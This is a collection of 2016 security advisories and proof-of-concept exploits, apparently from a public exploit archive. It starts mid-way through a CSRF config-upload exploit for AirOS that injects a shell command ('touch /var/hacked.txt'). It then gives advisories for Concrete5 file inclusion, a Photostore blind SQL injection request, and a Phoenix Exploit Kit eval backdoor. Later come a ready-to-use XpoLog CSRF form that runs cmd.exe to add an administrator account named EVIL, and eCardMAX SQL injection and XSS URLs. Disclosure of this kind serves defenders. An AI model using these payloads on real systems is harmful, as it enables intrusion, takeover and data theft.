"iptables.sys.masq.1.devname=eth0\n" +
"iptables.sys.masq.status=enabled\n" +
"iptables.sys.fw.status=disabled\n" +
"iptables.sys.dmz.status=disabled\n" +
"iptables.1.comment=\n" +
"iptables.1.cmd=-A FIREWALL -j ACCEPT; touch /var/hacked.txt\n" +
"iptables.1.status=enabled\n" +
"iptables.status=enabled\n" +
"igmpproxy.status=enabled\n" +
"igmpproxy.upstream.devname=eth0\n" +
"igmpproxy.1.downstream.devname=br0\n" +
"httpd.status=enabled\n" +
"httpd.session.timeout=900\n" +
"httpd.port=80\n" +
"httpd.https.status=enabled\n" +
"httpd.https.port=443\n" +
"gui.wlan.advanced.status=disabled\n" +
"gui.network.advanced.status=enabled\n" +
"ebtables.sys.vlan.status=disabled\n" +
"ebtables.sys.status=enabled\n" +
"ebtables.sys.eap.status=disabled\n" +
"ebtables.sys.eap.1.status=enabled\n" +
"ebtables.sys.eap.1.devname=ath0\n" +
"ebtables.sys.arpnat.status=disabled\n" +
"ebtables.sys.arpnat.1.status=enabled\n" +
"ebtables.sys.arpnat.1.devname=ath0\n" +
"ebtables.status=enabled\n" +
"dyndns.status=disabled\n" +
"dnsmasq.status=disabled\n" +
"dnsmasq.1.status=disabled\n" +
"dnsmasq.1.devname=eth0\n" +
"discovery.status=enabled\n" +
"discovery.cdp.status=enabled\n" +
"dhcpd.1.start=192.168.1.2\n" +
"dhcpd.1.netmask=255.255.255.0\n" +
"dhcpd.1.lease_time=600\n" +
"dhcpd.1.end=192.168.1.254\n" +
"dhcpd.1.dnsproxy=enabled\n" +
"dhcpd.1.devname=br0\n" +
"dhcpd.1.dns.2.status=disabled\n" +
"dhcpd.1.dns.2.server=\n" +
"dhcpd.1.dns.1.status=disabled\n" +
"dhcpd.1.dns.1.server=\n" +
"dhcpd.1.status=enabled\n" +
"dhcpd.status=enabled\n" +
"dhcpc.1.status=enabled\n" +
"dhcpc.1.fallback_netmask=255.255.255.0\n" +
"dhcpc.1.fallback=192.168.10.1\n" +
"dhcpc.1.devname=eth0\n" +
"dhcpc.status=enabled\n" +
"bridge.1.fd=1\n" +
"bridge.1.comment=\n" +
"bridge.1.port.2.devname=eth1\n" +
"bridge.1.port.2.status=enabled\n" +
"bridge.1.port.1.devname=ath0\n" +
"bridge.1.port.1.status=enabled\n" +
"bridge.1.stp.status=disabled\n" +
"bridge.1.devname=br0\n" +
"bridge.1.status=enabled\n" +
"bridge.status=enabled\n" +
"aaa.status=disabled\n" +
"aaa.1.status=disabled\n" +
"aaa.1.radius.macacl.status=disabled\n" +
"aaa.1.radius.auth.1.status=disabled\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"cfgupload\"\r\n" +
"\r\n" +
"Upload\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"action\"\r\n" +
"\r\n" +
"cfgupload\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"systemdate\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
document.getElementById("airos-exploit-apply").submit();
</script>
</body>
</html>
<!--
The contents of this advisory are copyright(c) 2016
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
-->
-------------------------------------------------------------------------------
Concrete5 <= 5.7.3.1 (Application::dispatch) Local File Inclusion Vulnerability
-------------------------------------------------------------------------------
[-] Software Link:
https://www.concrete5.org/
[-] Affected Versions:
Version 5.7.3.1 and probably other versions.
[-] Vulnerability Description:
The vulnerable code is located within the "Application::dispatch()" method:
326. public function dispatch(Request $request)
327. {
328. if ($this->installed) {
329. $response = $this->getEarlyDispatchResponse();
330. }
331. if (!isset($response)) {
332. $collection = Route::getList();
333. $context = new \Symfony\Component\Routing\RequestContext();
334. $context->fromRequest($request);
335. $matcher = new UrlMatcher($collection, $context);
336. $path = rtrim($request->getPathInfo(), '/') . '/';
337. try {
338. $request->attributes->add($matcher->match($path));
339. $matched = $matcher->match($path);
340. $route = $collection->get($matched['_route']);
341. Route::setRequest($request);
342. $response = Route::execute($route, $matched);
The vulnerability exists because the path for the incoming request is retrieved using the
"Request::getPathInfo()" method from the Symfony framework, which allows to specify the path
for the request within some HTTP headers (like "X-Original-URL" and some others). So, it might
be possible to specify paths containing "dot-dot-slash" sequences without worrying about URL
encoding and path normalization done by the web server. This could be exploited by unauthenticated
attackers to include arbitrary .php files located outside the Concrete5 root directory or from the
Concrete5 codebase itself (potentially leading to unauthorized access to certain functionalities)
by sending an HTTP request like this:
GET /concrete5/index.php HTTP/1.1
Host: localhost
X-Original-Url: /tools/../../index
Connection: keep-alive
The dispatching process for this request will try to re-include the index.php file,
and this will end up with an unexpected error.
[-] Solution:
Update to a fixed version.
[-] Disclosure Timeline:
[05/05/2015] - Vulnerability details sent through HackerOne
[02/10/2015] - CVE number requested
[19/12/2015] - Vulnerability fixed on the GitHub repository
[26/06/2016] - Vulnerability publicly disclosed on HackerOne
[28/06/2016] - Publication of this advisory
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has not assigned a CVE identifier for this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2016-10
[-] Other References:
https://hackerone.com/reports/59665
Title : Ktools Photostore <= 4.7.5 (Pre-Authentication) Blind SQL Injection
CVE-ID : CVE-2016-4337
Google Dork: inurl:mgr.login.php
Product : Photostore
Affected : Versions prior to 4.7.5
Impact : Critical
Remote : Yes
Website link: http://www.ktools.net
Reported : 02/06/2016
Authors : Gal Goldshtein and Viktor Minin
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
No authentication (login) is required to exploit this vulnerability.
The Photostore application password recovery module is prone to a blind sql injection attack.
An attacker can exploit this vulnerability to retrieve all the data stored in the application's database.
Vulnerable code is located in the mgr.login.php file:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
case 'recover_login': {
mysqli_query( $db, '' . 'SELECT username,password,email,admin_id FROM ' . $dbinfo[pre] . 'admins where email = \'' . $_POST['email'] . '\'' );
$result = ;
mysqli_num_rows( $result );
$returned_rows = ;
mysqli_fetch_array( $result );
$db_admin_user = ;
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
PoC:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
POST /photostore/manager/mgr.login.php?pmode=recover_login HTTP/1.1
Host: victim.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://server/photostore/manager/mgr.login.php?username=demo&password=demo
Cookie: member[umem_id]=58C05864CA6A59DBGHJSKDHGDGS770D5; PHPSESSID=30afayreighgfdgucb0d2b0c6dece3158
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 9
email=%27%20[SQL PAYLOAD];#
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Exploit Title: Phoenix Exploit Kit - Remote Code Execution
# Exploit Author: CrashBandicot @DosPerl
# Date: 2016-06-30
# Tested on: MSWin32
# Vuln file : geoip.php
492. isset($_GET['bdr']) ? eval($_GET['bdr']) : explode('nop','nop nop nop');
# PoC : http://localhost/Phoenix/includes/geoip.php?bdr=phpinfo();
# Screen : http://i.imgur.com/E7RBBRk.png
__END__
XpoLog Center V6 CSRF Remote Command Execution
Vendor: XpoLog LTD
Product web page: http://www.xpolog.com
Affected version: 6.4469
6.4254
6.4252
6.4250
6.4237
6.4235
5.4018
Summary: Applications Log Analysis and Management Platform.
Desc: XpoLog suffers from arbitrary command execution. Attackers
can exploit this issue using the task tool feature and adding a
command with respected arguments to given binary for execution.
In combination with the CSRF an attacker can execute system commands
with SYSTEM privileges.
Tested on: Apache-Coyote/1.1
Microsoft Windows Server 2012
Microsoft Windows 7 Professional SP1 EN 64bit
Java/1.7.0_45
Java/1.8.0.91
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5335
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5335.php
14.06.2016
--
exePath = "C:\\windows\\system32\\cmd.exe"
exeArgs = "/C net user EVIL pass123 /add & net localgroup Administrators EVIL /add"
<html>
<body>
<form action="http://10.0.0.17:30303/logeye/tasks/xpotaskDefinitionAction.jsp?" method="POST">
<input type="hidden" name="" value="" />
<input type="hidden" name="csrfToken" value="NoToken" />
<input type="hidden" name="taskId" value="1465930398522" />
<input type="hidden" name="taskType" value="exe" />
<input type="hidden" name="name" value="CCMMDD" />
<input type="hidden" name="description" value="ZSL" />
<input type="hidden" name="IsSsh" value="false" />
<input type="hidden" name="exePath" value=""c:\\windows\\system32\\cmd.exe"" />
<input type="hidden" name="exeArgs" value=""/C net user EVIL pass123 /add & net localgroup Administrators EVIL /add"" />
<input type="hidden" name="exeEnvVar" value="" />
<input type="hidden" name="exeWorkDir" value="" />
<input type="hidden" name="exeOutputTargetFile" value="" />
<input type="hidden" name="NameXpoTaskSched" value="taskId_1465930366962" />
<input type="hidden" name="IdXpoTaskSched" value="taskId_1465930366962" />
<input type="hidden" name="actionIdXpoTaskSched" value="0" />
<input type="hidden" name="StateXpoTaskSched" value="1" />
<input type="hidden" name="schedulerSuffix" value="XpoTaskSched" />
<input type="hidden" name="trigTypeXpoTaskSched" value="cron" />
<input type="hidden" name="minutesXpoTaskSched" value="0" />
<input type="hidden" name="minutesEndXpoTaskSched" value="0" />
<input type="hidden" name="numOfExecutionsXpoTaskSched" value="0" />
<input type="hidden" name="frequencyXpoTaskSched" value="daily" />
<input type="hidden" name="DayInMonthXpoTaskSched" value="all" />
<input type="hidden" name="dailyTypeXpoTaskSched" value="repeat" />
<input type="hidden" name="dailyRepeatValueXpoTaskSched" value="1" />
<input type="hidden" name="dailyRepeatTypeXpoTaskSched" value="second" />
<input type="hidden" name="hoursXpoTaskSched" value="0" />
<input type="hidden" name="hoursEndXpoTaskSched" value="0" />
<input type="hidden" name="hoursOnce0XpoTaskSched" value="-1" />
<input type="hidden" name="minutesOnce0XpoTaskSched" value="-1" />
<input type="hidden" name="secondsOnce0XpoTaskSched" value="-1" />
<input type="hidden" name="jobPriority" value="-1" />
<input type="hidden" name="ajaxTimestamp" value="1465930905166" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
--
exePath = "C:\\windows\\system32\\cmd.exe"
exeArgs = "/C whoami > c:\\Progra~1\\XpoLogCenter6\\defaultroot\\logeye\\testingus.txt"
GET
http://10.0.0.17:30303/logeye/testingus.txt
Response:
nt authority\system
Advisory ID: ZSL-2016-5336
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5336.php
eCardMAX 10.5 SQL Injection and XSS Vulnerabilities
[Software]
- eCardMAX 10.5
[Vendor]
- eCardMAX.COM - http://www.ecardmax.com/
[Vendor Product Description]
- eCardMax is the most trusted, powerful and dynamic online ecard software solution. It enables you to create your
own ecard website with many of the advanced features found on other major sites. Starting your own ecard website
with eCardMax is fast and easy.
[Advisory Timeline]
- 13/06/2016 -> Vulnerability discovered;
- 13/06/2016 -> First contact with vendor;
- 13/06/2016 -> Vendor responds asking for details;
- 14/06/2016 -> Vulnerability details sent to the vendor;
- 17/06/2016 -> Vendor working on a patch;
- 28/06/2016 -> Vendor Releases Patch
- 01/07/2016 -> Public Security Advisory Published
[Bug Summary]
- SQL Injection
- Cross Site Scripting (Reflected)
[Impact]
- High
[Affected Version]
- v10.5
[Tested on]
- Apache/2.2.26
- PHP/5.3.28
- MySQL/5.5.49-cll
[Bug Description and Proof of Concept]
- eCardMAX suffers from a SQL Injection vulnerability. Input passed via the 'row_number' GET parameter is not properly
sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.
- Multiple cross-site scripting vulnerabilities were also discovered. The issue is triggered when input passed via multiple parameters
is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's
browser session in context of an affected site.
[Proof-of-Concept]
1. SQL Injection:
Parameter: row_number (GET)
POC URL:
http://localhost/ecardmaxdemo/admin/index.php?step=admin_show_keyword&what=&row_number=10%20order%20by%201--&search_year=2016&page=2
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
2. Cross Site Scripting (Reflected):
http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display&search_field=all&keyword=%3Cscript%3Ealert(1)%3C%2Fscript%3E&cmd_button=Search+User
Parameter(s): keyword (GET)
http://localhost/ecardmaxdemo/admin/index.php?step=admin_cellphone_carrier&row_number=15&page=14%22%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
Parameter(s): page (GET)
http://localhost/ecardmaxdemo/admin/index.php?step=admin_show_keyword&what=&row_number=10%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search_year=2016&page=2
Parameter(s): row_number (GET)
http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display_inactive_account&what=&row_number=15&what2=&cmd_button=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&list_item=%3C/script%3E%3Cscript%3Ealert(2)%3C/script%3E&search_field=%3C/script%3E%3Cscript%3Ealert(3)%3C/script%3E&keyword=&num_day=%3C/script%3E%3Cscript%3Ealert(4)%3C/script%3E&num_what=%3C/script%3E%3Cscript%3Ealert(5)%3C/script%3E&from_month=%3C/script%3E%3Cscript%3Ealert(6)%3C/script%3E&from_day=%3C/script%3E%3Cscript%3Ealert(7)%3C/script%3E&from_year=%3C/script%3E%3Cscript%3Ealert(8)%3C/script%3E&to_day=%3C/script%3E%3Cscript%3Ealert(9)%3C/script%3E&to_month=%3C/script%3E%3Cscript%3Ealert(10)%3C/script%3E&to_year=%3C/script%3E%3Cscript%3Ealert(11)%3C/script%3E&page=2%3C/script%3E%3Cscript%3Ealert(12)%3C/script%3E
Parameter(s): cmd_button, list_item, search_field, num_day, num_what, from_month, from_day, from_year, to_day, to_month, to_year, page (GET)
http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display&search_field=user_name_id&cmd_button=Search+User&keyword=833981213299707%22%3E%3Cscript%3Ealert(1)%3C/script%3E
Parameter(s): keyword (GET)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
All flaws described here were discovered and researched by:
Bikramaditya Guha aka "PhoenixX"